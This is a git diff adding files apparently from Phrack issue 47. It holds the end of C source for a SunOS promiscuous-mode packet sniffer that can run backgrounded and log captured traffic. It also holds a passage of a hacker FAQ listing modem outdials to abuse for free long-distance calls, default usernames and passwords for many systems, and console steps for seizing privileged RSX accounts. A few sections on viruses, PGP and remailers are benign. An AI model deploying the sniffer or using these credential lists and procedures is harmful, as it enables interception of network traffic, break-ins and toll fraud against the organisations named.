+    struct ifreq    ifr;
+    struct timeval  timeout;
+    u_int  chunksize = CHUNKSIZE;
+    u_long if_flags  = NI_PROMISC;
+
+    if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
+        Pexit(1,"Eth: nit open");
+
+    if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
+        Pexit(1,"Eth: ioctl (I_SRDOPT)");
+
+    si.ic_timout = INFTIM;
+
+    if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
+        Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");
+
+    timeout.tv_sec = 1;
+    timeout.tv_usec = 0;
+    si.ic_cmd = NIOCSTIME;
+    si.ic_len = sizeof(timeout);
+    si.ic_dp  = (char *)&timeout;
+    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
+        Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");
+
+    si.ic_cmd = NIOCSCHUNK;
+    si.ic_len = sizeof(chunksize);
+    si.ic_dp  = (char *)&chunksize;
+    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
+        Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");
+
+    strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
+    ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
+    si.ic_cmd = NIOCBIND;
+    si.ic_len = sizeof(ifr);
+    si.ic_dp  = (char *)&ifr;
+    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
+        Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");
+
+    si.ic_cmd = NIOCSFLAGS;
+    si.ic_len = sizeof(if_flags);
+    si.ic_dp  = (char *)&if_flags;
+    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
+        Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");
+
+    if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
+        Pexit(1,"Eth: ioctl (I_FLUSH)");
+  }
+
+    while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
+        register char *bp = buf,
+                      *bufstop = (buf + cc);
+
+        while (bp < bufstop) {
+            register char *cp = bp;
+            register struct nit_bufhdr *hdrp;
+
+            hdrp = (struct nit_bufhdr *)cp;
+            cp += sizeof(struct nit_bufhdr);
+            bp += hdrp->nhb_totlen;
+            filter(cp, (u_long)hdrp->nhb_msglen);
+        }
+    }
+    Pexit((-1),"Eth: read");
+}
+ /* Authorize your proogie,generate your own password and uncomment here */
+/* #define AUTHPASSWD "EloiZgZejWyms" */
+
+void getauth()
+{ char *buf,*getpass(),*crypt();
+  char pwd[21],prmpt[81];
+
+    strcpy(pwd,AUTHPASSWD);
+    sprintf(prmpt,"(%s)UP? ",ProgName);
+    buf=getpass(prmpt);
+    if(strcmp(pwd,crypt(buf,pwd)))
+        exit(1);
+}
+    */
+void main(argc, argv)
+int argc;
+char **argv;
+{
+    char   cbuf[BUFSIZ];
+    struct ifconf ifc;
+    int    s,
+           ac=1,
+           backg=0;
+
+    ProgName=argv[0];
+
+ /*     getauth(); */
+
+    LOG=NULL;
+    device=NULL;
+    while((ac<argc) && (argv[ac][0] == '-')) {
+       register char ch = argv[ac++][1];
+       switch(toupper(ch)) {
+            case 'I': device=argv[ac++];
+                      break;
+            case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
+                         Zexit(1,"Output file cant be opened\n");
+                      break;
+            case 'B': backg=1;
+                      break;
+            case 'D': debug=1;
+                      break;
+            default : fprintf(ERR,
+                        "Usage: %s [-b] [-d] [-i interface] [-f file]\n",
+                            ProgName);
+                      exit(1);
+       }
+    }
+
+    if(!device) {
+        if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
+            Pexit(1,"Eth: socket");
+
+        ifc.ifc_len = sizeof(cbuf);
+        ifc.ifc_buf = cbuf;
+        if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
+            Pexit(1,"Eth: ioctl");
+
+        close(s);
+        device = ifc.ifc_req->ifr_name;
+    }
+
+    fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
+    fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
+            (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");
+
+    if(!LOG)
+        LOG=stdout;
+
+    signal(SIGINT, death);
+    signal(SIGTERM,death);
+    signal(SIGKILL,death);
+    signal(SIGQUIT,death);
+
+    if(backg && debug) {
+         fprintf(ERR,"[Cannot bg with debug on]\n");
+         backg=0;
+    }
+
+    if(backg) {
+        register int s;
+
+        if((s=fork())>0) {
+           fprintf(ERR,"[pid %d]\n",s);
+           exit(0);
+        } else if(s<0)
+           Pexit(1,"fork");
+
+        if( (s=open("/dev/tty",O_RDWR))>0 ) {
+                ioctl(s,TIOCNOTTY,(char *)NULL);
+                close(s);
+        }
+    }
+    fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());
+    fflush(LOG);
+
+    do_it();
+}
+
diff --git a/phrack47/6.txt b/phrack47/6.txt
new file mode 100644
index 0000000..1746ac4
--- /dev/null
+++ b/phrack47/6.txt
@@ -0,0 +1,1158 @@
+                              ==Phrack Magazine==
+
+                 Volume Six, Issue Forty-Seven, File 6 of 22
+
+
+
+18. What is an Internet Outdial?
+
+An Internet outdial is a modem connected to the Internet than you can
+use to dial out.  Normal outdials will only call local numbers.  A GOD
+(Global OutDial) is capable of calling long distance.  Outdials are an
+inexpensive method of calling long distance BBS's.
+
+
+19. What are some Internet Outdials?
+
+This FAQ answer is excerpted from CoTNo #5:
+
+			Internet Outdial List v3.0
+			 by Cavalier and DisordeR
+
+
+Introduction
+------------
+There are several lists of Internet outdials floating around the net these
+days. The following is a compilation of other lists, as well as v2.0 by
+DeadKat(CoTNo issue 2, article 4). Unlike other lists where the author
+just ripped other people and released it, we have sat down and tested
+each one of these. Some of them we have gotten "Connection Refused" or
+it timed out while trying to connect...these have been labeled dead.
+
+
+			   Working Outdials
+			   ----------------
+			    as of 12/29/94
+
+NPA          IP Address                   Instructions
+---          ----------                   ------------
+215          isn.upenn.edu                modem
+
+217          dialout.cecer.army.mil       atdt x,xxxXXXXX
+
+218          modem.d.umn.edu              atdt9,xxxXXXX
+
+303          yuma.acns.colostate.edu 3020
+
+412          gate.cis.pitt.edu            tn3270, 
+					  connect dialout.pitt.edu, 
+					  atdtxxxXXXX
+
+413          dialout2400.smith.edu        Ctrl } gets ENTER NUMBER: xxxxxxx
+
+502          outdial.louisville.edu
+
+502          uknet.uky.edu                connect kecnet
+                                          @ dial: "outdial2400 or out"
+
+602          acssdial.inre.asu.edu        atdt8,,,,,[x][yyy]xxxyyyy
+
+614          ns2400.acs.ohio-state.edu
+
+614          ns9600.acs.ohio-state.edu
+
+713          128.249.27.153               atdt x,xxxXXXX
+
+714          modem.nts.uci.edu            atdt[area]0[phone]
+
+804          ublan.virginia.edu           connect hayes, 9,,xxx-xxxx
+
+804          ublan2.acc.virginia.edu      connect telnet
+                                          connect hayes
+
+
+
+                           Need Password
+			   -------------
+
+206          rexair.cac.washington.edu    This is an unbroken password
+303          yuma.ACNS.ColoState.EDU      login: modem
+404          128.140.1.239                .modem8|CR
+415          annex132-1.EECS.Berkeley.EDU "dial1" or "dial2" or "dialer1"
+514          cartier.CC.UMontreal.CA      externe,9+number
+703          wal-3000.cns.vt.edu          dial2400 -aa
+
+
+                          Dead/No Connect
+                          ---------------
+
+201          idsnet
+202          modem.aidt.edu
+204          dial.cc.umanitoba.ca
+204          umnet.cc.manitoba.ca         "dial12" or "dial24"
+206          dialout24.cac.washington.edu
+207          modem-o.caps.maine.edu
+212          B719-7e.NYU.EDU              dial3/dial12/dial24
+212          B719-7f.NYU.EDU              dial3/dial12/dial24
+212          DIALOUT-1.NYU.EDU            dial3/dial12/dial24
+212          FREE-138-229.NYU.EDU         dial3/dial12/dial24
+212          UP19-4b.NYU.EDU              dial3/dial12/dial24
+215          wiseowl.ocis.temple.edu      "atz" "atdt 9xxxyyyy"
+218          aa28.d.umn.edu               "cli" "rlogin modem"
+                                          at "login:"  type "modem"
+218          modem.d.umn.edu              Hayes 9,XXX-XXXX
+301          dial9600.umd.edu
+305          alcat.library.nova.edu
+305          office.cis.ufl.edu
+307          modem.uwyo.edu               Hayes  0,XXX-XXXX
+313          35.1.1.6                     dial2400-aa or dial1200-aa
+                                          or dialout
+402          dialin.creighton.edu
+402          modem.criegthon.edu
+404          broadband.cc.emory.edu       ".modem8" or ".dialout"
+408          dialout.scu.edu
+408          dialout1200.scu.edu
+408          dialout2400.scu.edu
+408          dialout9600.scu.edu
+413          dialout.smith.edu
+414          modems.uwp.edu
+416          annex132.berkely.edu         atdt 9,,,,, xxx-xxxx
+416          pacx.utcs.utoronto.ca        modem
+503          dialout.uvm.edu
+513          dialout24.afit.af.mil
+513          r596adi1.uc.edu
+514          pacx.CC.UMontreal.CA         externe#9 9xxx-xxxx
+517          engdial.cl.msu.edu
+602          dial9600.telcom.arizona.edu
+603          dialout1200.unh.edu
+604          dial24-nc00.net.ubc.ca
+604          dial24-nc01.net.ubc.ca
+604          dial96-np65.net.ubc.ca
+604          gmodem.capcollege.bc.ca
+604          hmodem.capcollege.bc.ca
+609          128.119.131.11X (X= 1 - 4)   Hayes
+609          129.119.131.11x  (x = 1 to 4)
+609          wright-modem-1.rutgers.edu
+609          wright-modem-2.rutgers.edu
+612          modem_out12e7.atk.com
+612          modem_out24n8.atk.com
+614          ns2400.ircc.ohio-state.edu   "dial"
+615          dca.utk.edu                  dial2400 D 99k #
+615          MATHSUN23.MATH.UTK.EDU       dial 2400  d  99Kxxxxxxx
+616          modem.calvin.edu
+617          128.52.30.3                  2400baud
+617          dialout.lcs.mit.edu
+617          dialout1.princeton.edu
+617          isdn3.Princeton.EDU
+617          jadwingymkip0.Princeton.EDU
+617          lord-stanley.Princeton.EDU
+617          mpanus.Princeton.EDU
+617          mrmodem.wellesley.edu
+617          old-dialout.Princeton.EDU
+617          stagger.Princeton.EDU
+617          sunshine-02.lcs.mit.edu
+617          waddle.Princeton.EDU
+619          128.54.30.1                  atdt [area][phone]
+619          dialin.ucsd.edu              "dialout"
+703          modem_pool.runet.edu
+703          wal-3000.cns.vt.edu
+713          128.249.27.154               "c modem96"  "atdt 9xxx-xxxx"
+                                          or "Hayes"
+713          modem12.bcm.tmc.edu
+713          modem24.bcm.tmc.edu
+713          modem24.bcm.tmc.edu
+714          mdmsrv7.sdsu.edu             atdt 8xxx-xxxx
+714          modem24.nts.uci.edu
+714          pub-gopher.cwis.uci.edu
+801          dswitch.byu.edu              "C Modem"
+808          irmodem.ifa.hawaii.edu
+902          star.ccs.tuns.ca             "dialout"
+916          129.137.33.72
+916          cc-dnet.ucdavis.edu          connect hayes/dialout
+916          engr-dnet1.engr.ucdavis.edu  UCDNET <ret> C KEYCLUB <ret>
+???          128.119.131.11X              (1 - 4)
+???          128.200.142.5
+???          128.54.30.1                  nue, X to discontinue, ? for Help
+???          128.6.1.41
+???          128.6.1.42
+???          129.137.33.72
+???          129.180.1.57
+???          140.112.3.2                  ntu            <none>
+???          annexdial.rz.uni-duesseldorf.de
+???          dial96.ncl.ac.uk
+???          dialout.plk.af.mil
+???          ee21.ee.ncu.edu.tw           cs8005
+???          im.mgt.ncu.edu.tw            guest           <none>
+???          modem.cis.uflu.edu
+???          modem.ireq.hydro.qc.ca
+???          modems.csuohio.edu
+???          sparc20.ncu.edu.tw           u349633
+???          sun2cc.nccu.edu.tw           ?
+???          ts-modem.une.oz.au
+???          twncu865.ncu.edu.tw          guest           <none>
+???          vtnet1.cns.ut.edu            "CALL" or "call"
+
+
+Conclusion
+----------
+If you find any of the outdials to have gone dead, changed commands,
+or require password, please let us know so we can keep this list as
+accurate as possible. If you would like to add to the list, feel free
+to mail us and it will be included in future versions of this list,
+with your name beside it. Have fun...
+
+[Editors note: Updates have been made to this document after
+               the original publication]
+
+
+20. What is this system?
+
+
+AIX
+~~~
+IBM AIX Version 3 for RISC System/6000
+(C) Copyrights by IBM and by others 1982, 1990.
+login:
+
+[You will know an AIX system because it is the only Unix system that]
+[clears the screen and issues a login prompt near the bottom of the]
+[screen]
+
+
+AS/400
+~~~~~~
+UserID?
+Password?
+
+Once in, type GO MAIN
+
+
+CDC Cyber
+~~~~~~~~~
+WELCOME TO THE NOS SOFTWARE SYSTEM.
+COPYRIGHT CONTROL DATA 1978, 1987.
+
+88/02/16. 02.36.53. N265100
+CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
+FAMILY:
+
+You would normally just hit return at the family prompt.  Next prompt is:
+
+USER NAME:
+
+
+CISCO Router
+~~~~~~~~~~~~
+                             FIRST BANK OF TNO
+                           95-866 TNO VirtualBank
+                          REMOTE Router -  TN043R1
+
+                                Console Port
+
+                                SN - 00000866
+
+TN043R1>
+
+
+DECserver
+~~~~~~~~~
+DECserver 700-08 Communications Server V1.1 (BL44G-11A) - LAT V5.1
+DPS502-DS700
+
+(c) Copyright 1992, Digital Equipment Corporation - All Rights Reserved
+
+Please type HELP if you need assistance
+
+Enter username> TNO
+
+Local>
+
+
+Hewlett Packard MPE-XL
+~~~~~~~~~~~~~~~~~~~~~~
+MPE XL:
+EXPECTED A :HELLO COMMAND. (CIERR 6057)
+MPE XL:
+EXPECTED [SESSION NAME,] USER.ACCT [,GROUP]   (CIERR 1424)
+MPE XL:
+
+
+GTN
+~~~
+WELCOME TO CITIBANK. PLEASE SIGN ON.
+XXXXXXXX
+
+@
+PASSWORD =
+
+@
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+PLEASE ENTER YOUR ID:-1->
+PLEASE ENTER YOUR PASSWORD:-2->
+
+CITICORP (CITY NAME). KEY GHELP FOR HELP.
+  XXX.XXX
+ PLEASE SELECT SERVICE REQUIRED.-3->
+
+
+Lantronix Terminal Server
+~~~~~~~~~~~~~~~~~~~~~~~~~
+Lantronix ETS16 Version V3.1/1(940623)
+
+Type HELP at the 'Local_15> ' prompt for assistance.
+
+Login password>
+
+
+Meridian Mail (Northern Telecom Phone/Voice Mail System)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                            MMM       MMMERIDIAN
+                           MMMMM     MMMMM
+                         MMMMMM   MMMMMM
+                        MMM  MMMMM  MMM     MMMMM     MMMMM
+                      MMM   MMM   MMM     MMMMMM   MMMMMM
+                     MMM         MMM     MMM MMM MMM MMM
+                    MMM         MMM     MMM  MMMMM  MMM
+                   MMM         MMM     MMM   MMM   MMM
+                  MMM         MMM     MMM         MMM
+                 MMM         MMM     MMM         MMM
+                MMM         MMM     MMM         MMM
+               MMM         MMM     MMM         MMM
+              MMM         MMM     MMM         MMM
+
+                                          Copyright (c) Northern Telecom, 1991
+
+
+Novell ONLAN
+~~~~~~~~~~~~
+
N
+
+[To access the systems it is best to own a copy of ONLAN/PC]
+
+
+PC-Anywhere
+~~~~~~~~~~~
+
P
+
+[To access the systems it is best to own a copy of PCAnywhere Remote]
+
+
+PRIMOS
+~~~~~~
+PRIMENET 19.2.7F PPOA1
+
+<any text>
+
+ER!
+
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+CONNECT
+Primenet V 2.3  (system)
+LOGIN           (you)
+User id?        (system)
+SAPB5           (you)
+Password?       (system)
+DROWSAP         (you)
+OK,             (system)
+
+
+ROLM-OSL
+~~~~~~~~
+MARAUDER10292  01/09/85(^G) 1 03/10/87  00:29:47
+RELEASE 8003
+OSL, PLEASE.
+?
+
+
+System75
+~~~~~~~~
+Login: root
+INCORRECT LOGIN
+
+Login: browse
+Password:
+
+Software Version: G3s.b16.2.2
+
+Terminal Type (513, 4410, 4425): [513]
+
+
+Tops-10
+~~~~~~~
+NIH Timesharing
+
+NIH Tri-SMP 7.02-FF  16:30:04 TTY11
+system 1378/1381/1453 Connected to Node Happy(40) Line # 12
+Please LOGIN
+.
+
+
+VM/370
+~~~~~~
+VM/370
+!
+
+
+VM/ESA
+~~~~~~
+VM/ESA ONLINE
+
+                                          TBVM2 VM/ESA Rel 1.1     PUT 9200
+
+Fill in your USERID and PASSWORD and press ENTER
+(Your password will not appear when you type it)
+USERID   ===>
+PASSWORD ===>
+
+COMMAND  ===>
+
+
+Xylogics Annex Communications Server
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Annex Command Line Interpreter   *   Copyright 1991 Xylogics, Inc.
+
+Checking authorization, Please wait...
+Annex username: TNO
+Annex password:
+
+Permission granted
+annex:
+
+
+21. What are the default accounts for XXX?
+
+AIX
+~~~
+guest           guest
+
+
+AS/400
+~~~~~~
+qsecofr         qsecofr         /* master security officer */
+qsysopr         qsysopr         /* system operator         */
+qpgmr           qpgmr           /* default programmer      */
+
+also
+
+ibm/password
+ibm/2222
+ibm/service
+qsecofr/1111111
+qsecofr/2222222
+qsvr/qsvr
+secofr/secofr
+
+
+DECserver
+~~~~~~~~~
+ACCESS
+SYSTEM
+
+
+Dynix (The library software, not the UnixOS)
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+(Type 'later' to exit to the login prompt)
+setup           <no password>
+library         <no password>
+circ            <9 digit number>
+
+
+Hewlett Packard MPE-XL
+~~~~~~~~~~~~~~~~~~~~~~
+HELLO           MANAGER.SYS
+HELLO           MGR.SYS
+HELLO           FIELD.SUPPORT     HPUNSUP or SUPPORT or HP
+HELLO           OP.OPERATOR
+MGR             CAROLIAN
+MGR             CCC
+MGR             CNAS
+MGR             CONV
+MGR             COGNOS
+OPERATOR        COGNOS
+MANAGER         COGNOS
+OPERATOR        DISC
+MGR             HPDESK
+MGR             HPWORD
+FIELD           HPWORD
+MGR             HPOFFICE
+SPOOLMAN        HPOFFICE
+ADVMAIL         HPOFFICE
+MAIL            HPOFFICE
+WP              HPOFFICE
+MANAGER         HPOFFICE
+MGR             HPONLY
+FIELD           HPP187
+MGR             HPP187
+MGR             HPP189
+MGR             HPP196
+MGR             INTX3
+MGR             ITF3000
+MANAGER         ITF3000
+MAIL            MAIL
+MGR             NETBASE
+MGR             REGO
+MGR             RJE
+MGR             ROBELLE
+MANAGER         SECURITY
+MGR             SECURITY
+FIELD           SERVICE
+MANAGER         SYS
+MGR             SYS
+PCUSER          SYS
+RSBCMON         SYS
+OPERATOR        SYS
+OPERATOR        SYSTEM
+FIELD           SUPPORT
+OPERATOR        SUPPORT
+MANAGER         TCH
+MAIL            TELESUP
+MANAGER         TELESUP
+MGR             TELESUP
+SYS             TELESUP
+MGE             VESOFT
+MGE             VESOFT
+MGR             WORD
+MGR             XLSERVER
+
+Common jobs are Pub, Sys, Data
+Common passwords are HPOnly, TeleSup, HP, MPE, Manager, MGR, Remote
+
+
+Major BBS
+~~~~~~~~~
+Sysop           Sysop
+
+
+Mitel PBX
+~~~~~~~~~
+SYSTEM
+
+
+Nomadic Computing Environment (NCE) on the Tadpole Technologies SPARCBook3
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+fax             <no password>
+
+
+PICK O/S
+~~~~~~~~
+DSA             # Desquetop System Administrator
+DS
+DESQUETOP
+PHANTOM
+
+
+Prolog
+~~~~~~
+PBX             PBX
+NETWORK         NETWORK
+NETOP           <null>
+
+
+Rolm
+~~~~
+CBX Defaults
+
+op              op
+op              operator
+su              super
+admin           pwp
+eng             engineer
+
+
+PhoneMail Defaults
+
+sysadmin        sysadmin
+tech            tech
+poll            tech
+
+
+RSX
+~~~
+SYSTEM/SYSTEM   (Username SYSTEM, Password SYSTEM)
+1,1/system      (Directory [1,1] Password SYSTEM)
+BATCH/BATCH
+SYSTEM/MANAGER
+USER/USER
+
+Default accounts for Micro/RSX:
+
+		MICRO/RSX
+
+Alternately you can hit <CTRL-Z>  when the boot sequence asks you for the
+date and create an account using:
+
+		RUN ACNT
+	    or  RUN $ACNT
+
+(Numbers below 10 {oct} are Priveleged)
+
+Reboot and wait for the date/time question. Type ^C and at the MCR prompt,
+type "abo at." You must include the . dot!
+
+If this works, type "acs lb0:/blks=1000" to get some swap space so the
+new step won't wedge.
+
+type " run $acnt" and change the password of any account with a group
+number of 7 or less.
+
+You may find that the ^C does not work. Try ^Z and ESC as well.
+Also try all 3 as terminators to valid and invalid times.
+
+If none of the above work, use the halt switch to halt the system,
+just after a invalid date-time.  Look for a user mode PSW 1[4-7]xxxx.
+then deposit 177777 into R6, cross your fingers, write protect the drive
+and continue the system.  This will hopefully result in indirect blowing
+up...  And hopefully the system has not been fully secured.
+
+
+SGI Irix
+~~~~~~~~
+4DGifts         <no password>
+guest           <no password>
+demos           <no password>
+lp              <no password>
+nuucp           <no password>
+tour            <no password>
+tutor           <no password>
+
+
+System 75
+~~~~~~~~~
+bcim            bcimpw
+bciim           bciimpw
+bcms            bcmspw, bcms
+bcnas           bcnspw
+blue            bluepw
+browse          looker, browsepw
+craft           crftpw, craftpw, crack
+cust            custpw
+enquiry         enquirypw
+field           support
+inads           indspw, inadspw, inads
+init            initpw
+kraft           kraftpw
+locate          locatepw
+maint           maintpw, rwmaint
+nms             nmspw
+rcust           rcustpw
+support         supportpw
+tech            field
+
+
+Taco Bell
+~~~~~~~~~
+rgm             rollout
+tacobell        <null>
+
+		  
+Verifone Junior 2.05
+~~~~~~~~~~~~~~~~~~~~
+Default password: 166816
+
+
+VMS
+~~~
+field           service
+systest         utep
+
+
+XON / XON Junior
+~~~~~~~~~~~~~~~~
+Default password: 166831
+
+
+22. What port is XXX on?
+
+The file /etc/services on most Unix machines lists the port
+assignments for that machine.  For a complete list of port
+assignments, read RFC (Request For Comments) 1700 "Assigned Numbers"
+
+
+23.  What is a trojan/worm/virus/logic bomb?
+
+This FAQ answer was written by Theora:
+
+Trojan:
+
+Remember the Trojan Horse?  Bad guys hid inside it until they could
+get into the city to do their evil deed.  A trojan computer program is
+similar.  It is a program which does an unauthorized function, hidden
+inside an authorized program.  It does something other than what it
+claims to do, usually something malicious (although not necessarily!),
+and it is intended by the author to do whatever it does.  If it's not
+intentional, its called a 'bug' or, in some cases, a feature :) Some
+virus scanning programs detect some trojans.  Some virus scanning
+programs don't detect any trojans.  No virus scanners detect all
+trojans.
+
+Virus:
+
+A virus is an independent program which reproduces itself.  It may
+attach to other programs, it may create copies of itself (as in
+companion viruses).  It may damage or corrupt data, change data, or
+degrade the performance of your system by utilizing resources such as
+memory or disk space.  Some virus scanners detect some viruses.  No
+virus scanners detect all viruses.  No virus scanner can protect
+against "any and all viruses, known and unknown, now and forevermore".
+
+Worm:
+
+Made famous by Robert Morris, Jr. , worms are programs which reproduce
+by copying themselves over and over, system to system, using up
+resources and sometimes slowing down the systems.  They are self
+contained and use the networks to spread, in much the same way viruses
+use files to spread.  Some people say the solution to viruses and
+worms is to just not have any files or networks.  They are probably
+correct.  We would include computers.
+
+Logic Bomb:
+
+Code which will trigger a particular form of 'attack' when a
+designated condition is met.  For instance, a logic bomb could delete
+all files on Dec.  5th.  Unlike a virus, a logic bomb does not make
+copies of itself.
+
+
+24.  How can I protect myself from viruses and such?
+
+This FAQ answer was written by Theora:
+
+The most common viruses are boot sector infectors.  You can help
+protect yourself against those by write protecting all disks which you
+do not need write access to.  Definitely keep a set of write protected
+floppy system disks.  If you get a virus, it will make things much
+simpler.  And, they are good for coasters.  Only kidding.
+
+Scan all incoming files with a recent copy of a good virus scanner.
+Among the best are F-Prot, Dr.  Solomon's Anti-virus Toolkit, and
+Thunderbyte Anti-Virus.  AVP is also a good proggie.  Using more than
+one scanner could be helpful.  You may get those one or two viruses
+that the other guy happened to miss this month.
+
+New viruses come out at the rate of about 8 per day now.  NO scanner
+can keep up with them all, but the four mentioned here do the best job
+of keeping current.  Any _good_ scanner will detect the majority of
+common viruses.  No virus scanner will detect all viruses.
+
+Right now there are about 5600 known viruses.  New ones are written
+all the time.  If you use a scanner for virus detection, you need to
+make sure you get frequent updates.  If you rely on behaviour
+blockers, you should know that such programs can be bypassed easily by
+a technique known as tunnelling.
+
+You may want to use integrity checkers as well as scanners.  Keep in
+mind that while these can supply added protection, they are not
+foolproof.
+
+You may want to use a particular kind of scanner, called resident
+scanners.  Those are programs which stay resident in the computer
+memory and constantly monitor program execution (and sometimes even
+access to the files containing programs).  If you try to execute a
+program, the resident scanner receives control and scans it first for
+known viruses.  Only if no such viruses are found, the program is
+allowed to execute.
+
+Most virus scanners will not protect you against many kinds of
+trojans, any sort of logic bombs, or worms.  Theoretically, they
+_could_ protect you against logic bombs and/or worms, by addition of
+scanning strings; however, this is rarely done.
+
+The best, actually only way, to protect yourself is to know what you
+have on your system and make sure what you have there is authorised by
+you.  Make freqent backups of all important files.  Keep your DOS
+system files write protected.  Write protect all disks that you do not
+need to write to.  If you do get a virus, don't panic.  Call the
+support department of the company who supplies your anti-virus product
+if you aren't sure of what you are doing.  If the company you got your
+anti-virus software from does not have a good technical support
+department, change companies.
+
+The best way to make sure viruses are not spread is not to spread
+them.  Some people do this intentionally.  We discourage this. Viruses
+aren't cool.
+
+
+25.  Where can I get more information about viruses?
+
+This FAQ answer was written by Theora:
+
+Assembly lanaguage programming books illustrate the (boring) aspect of
+replication and have for a long time.  The most exciting/interesting
+thing about viruses is all the controversy around them.  Free speech,
+legality, and cute payloads are a lot more interesting than "find
+first, find next" calls.  You can get information about the technical
+aspects of viruses, as well as help if you should happen to get a
+virus, from the virus-l FAQ, posted on comp. virus every so often.
+You can also pick up on the various debates there.  There are
+alt.virus type newsgroups, but the level of technical expertise is
+minimal, and so far at least there has not been a lot of real "help"
+for people who want to get -rid- of a virus.
+
+There are a lot of virus experts.  To become one, just call yourself
+one.  Only Kidding.  Understanding viruses involves understanding
+programming, operating systems, and their interaction.  Understanding
+all of the 'Cult of Virus' business requires a lot of discernment.
+There are a number of good papers available on viruses, and the Cult
+of Virus; you can get information on them from just about anyone
+listed in the virus-l FAQ.  The FTP site ftp.informatik.uni-hamburg.de
+is a pretty reliable site for proggies and text.
+
+
+26. What is Cryptoxxxxxxx?
+
+This FAQ answer is excerpted from: Computer Security Basics
+                                   by Deborah Russell
+                                   and G.T. Gengemi Sr.
+
+A message is called either plaintext or cleartext.  The process of
+disguising a message in such a way as to hide its substance is called
+encryption.  An encrypted message is called ciphertext.  The process
+of turning ciphertext back into plaintext is called decryption.
+
+The art and science of keeping messages secure is called cryptography,
+and it is practiced by cryptographers.  Cryptanalysts are
+practitioners of cryptanalysis, the art and science of breaking
+ciphertext, i.e. seeing through the disguise.  The branch of
+mathematics embodying both cryptography and cryptanalysis is called
+cryptology, and it's practitioners are called cryptologists.
+
+
+27. What is PGP?
+
+This FAQ answer is excerpted from: PGP(tm) User's Guide
+                                   Volume I: Essential Topics
+                                   by Philip Zimmermann
+
+PGP(tm) uses public-key encryption to protect E-mail and data files.
+Communicate securely with people you've never met, with no secure
+channels needed for prior exchange of keys.  PGP is well featured and
+fast, with sophisticated key management, digital signatures, data
+compression, and good ergonomic design.
+
+Pretty Good(tm) Privacy (PGP), from Phil's Pretty Good Software, is a
+high security cryptographic software application for MS-DOS, Unix,
+VAX/VMS, and other computers.  PGP allows people to exchange files or
+messages with privacy, authentication, and convenience.  Privacy means
+that only those intended to receive a message can read it.
+Authentication means that messages that appear to be from a particular
+person can only have originated from that person. Convenience means
+that privacy and authentication are provided without the hassles of
+managing keys associated with conventional cryptographic software.  No
+secure channels are needed to exchange keys between users, which makes
+PGP much easier to use.  This is because PGP is based on a powerful
+new technology called "public key" cryptography.
+
+PGP combines the convenience of the Rivest-Shamir-Adleman (RSA)
+public key cryptosystem with the speed of conventional cryptography,
+message digests for digital signatures, data compression before
+encryption, good ergonomic design, and sophisticated key management. 
+And PGP performs the public-key functions faster than most other
+software implementations.  PGP is public key cryptography for the
+masses.
+
+
+28. What is Tempest?
+
+Tempest stands for Transient Electromagnetic Pulse Surveillance
+Technology.
+
+Computers and other electronic equipment release interference to their
+surrounding environment.  You may observe this by placing two video
+monitors close together.  The pictures will behave erratically until
+you space them apart.
+
+Although most of the time these emissions are simply annoyances, they
+can sometimes be very helpful.  Suppose we wanted to see what project
+a target was working on.  We could sit in a van outside her office and
+use sensitive electronic equipment to attempt to pick up and decipher
+the emanations from her video monitor.
+
+Our competitor, however, could shield the emanations from her
+equipment or use equipment without strong emanations.
+
+Tempest is the US Government program for evaluation and endorsement
+of electronic equipment that is safe from eavesdropping.
+
+
+29. What is an anonymous remailer?
+
+An anonymous remailer is a system on the Internet that allows you to
+send e-mail anonymously or post messages to Usenet anonymously.
+
+You apply for an anonymous ID at the remailer site.  Then, when you
+send a message to the remailer, it sends it out from your anonymous ID
+at the remailer.  No one reading the post will know your real account
+name or host name.  If someone sends a message to your anonymous ID,
+it will be forwarded to your real account by the remailer.
+
+
+30. What are the addresses of some anonymous remailers?
+
+The most popular and stable anonymous remailer is anon.penet.fi,
+operated by Johan Helsingus.  To obtain an anonymous ID, mail
+ping@anon.penet.fi.  For assistance is obtaining an anonymous account
+at penet, mail help@anon.penet.fi.
+
+To see a list on anonymous remailers, finger
+remailer-list@kiwi.cs.berkeley.edu.
+
+
+31. How do I defeat Copy Protection?
+
+There are two common methods of defeating copy protection.  The first
+is to use a program that removes copy protection.  Popular programs
+that do this are CopyIIPC from Central Point Software and CopyWrite
+from Quaid Software.  The second method involves patching the copy
+protected program.  For popular software, you may be able to locate a
+ready made patch.  You can them apply the patch using any hex editor,
+such as debug or the Peter Norton's DiskEdit.  If you cannot, you must
+patch the software yourself.
+
+Writing a patch requires a debugger, such as Soft-Ice or Sourcer.  It
+also requires some knowledge of assembly language.  Load the protected
+program under the debugger and watch for it to check the protection
+mechanism.  When it does, change that portion of the code.  The code
